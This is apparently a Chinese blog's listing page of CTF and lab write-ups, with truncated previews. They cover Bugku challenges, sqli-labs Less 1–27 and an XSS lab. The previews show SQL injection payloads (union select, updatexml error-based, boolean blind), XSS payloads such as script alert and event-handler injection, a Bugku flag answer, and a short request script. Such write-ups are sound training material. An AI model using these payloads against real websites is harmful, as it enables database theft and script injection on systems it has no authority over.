CTF
睦雨承风
学习,就是一个人的朝圣
展开
-
bugku 杂项 签到题
这个题算是很简单,没有难度的了,点开题之后会有一个二维码,微信扫描二维码关注bugku微信公众号就有答案了。 题目答案:flag{BugKu-Sec-pwn!}原创 2019-10-26 22:25:14 · 438 阅读 · 0 评论 -
SQL练习Less1-10题解
SQL练习,用的自己装的服务器,127.0.0.1/sqli/Less-1 题解(部分的结果附在了后面)(看的时候注意,有些是答案附在了后面) Less 1 联合查询 求列数 ?id=1' order by 4%23 ?id=1' order by 3%23(共3列) 求显示位 ?id=1' and 1=2 union select 1,2,3%23 求数据库名 ?id=1' ...原创 2019-08-24 08:38:22 · 618 阅读 · 0 评论 -
SQL练习 Less11-20
127.0.0.1/sqli/ (注意:有些后面直接附上了答案) Less 11 1'or 1=1# 求数据库长度(布尔型盲注) 1' or length(database())=8# 求数据库名(xpath) 1'and updatexml(1,concat(0x23,database()),1)# 求表数 1' or (select count(table_name) fro...原创 2019-08-24 08:42:48 · 275 阅读 · 0 评论 -
SQL练习Less21-27题解
(注意:有些后面直接附上了答案) Less 21 先找出 账号和密码 之后用火狐登录后 用burp拦截 之后 爆库名 1' or updatexml(1,concat(0x7e,(database())),0) or ' 用小葵转制Base64编码发送 邮件刷新之后burp重新拦截 爆表名 1' or updatexml(1,concat(0x23,(select group_...原创 2019-08-24 08:46:58 · 382 阅读 · 0 评论 -
Bugku web 成绩单
本题直接在页面中的查询栏输入: 1' order by 4# (求出列数4列) 1' and 1=2 union select 1,2,3,4# (求显示位) 1'and 1=2 union select 1,2,database(),4# (求出数据库skctf_flag) 1'and 1=2 union select 1,2,3,group_concat(table_name)from...原创 2019-08-24 08:53:49 · 307 阅读 · 0 评论 -
bugku秋名山车神
python import requests import re url = 'http://123.206.87.240:8002/qiumingshan/' s = requests.Session() source = s.get(url) ans = re.findall('<div>(.*?)=?;</div>', source.text) ans ...原创 2019-08-24 08:55:36 · 554 阅读 · 0 评论 -
xss题解
依然是自己地服务器http://127.0.0.1/xss 答案: 1.result: payload框加上 <script>alert(1)</script> 2.result: payload框加上 ?keyword=%09+"+onclick%3Dalert(1)>+需要点击一下输入框。<br> ?keyword=%09+" onmouseo...原创 2019-08-24 09:08:40 · 372 阅读 · 0 评论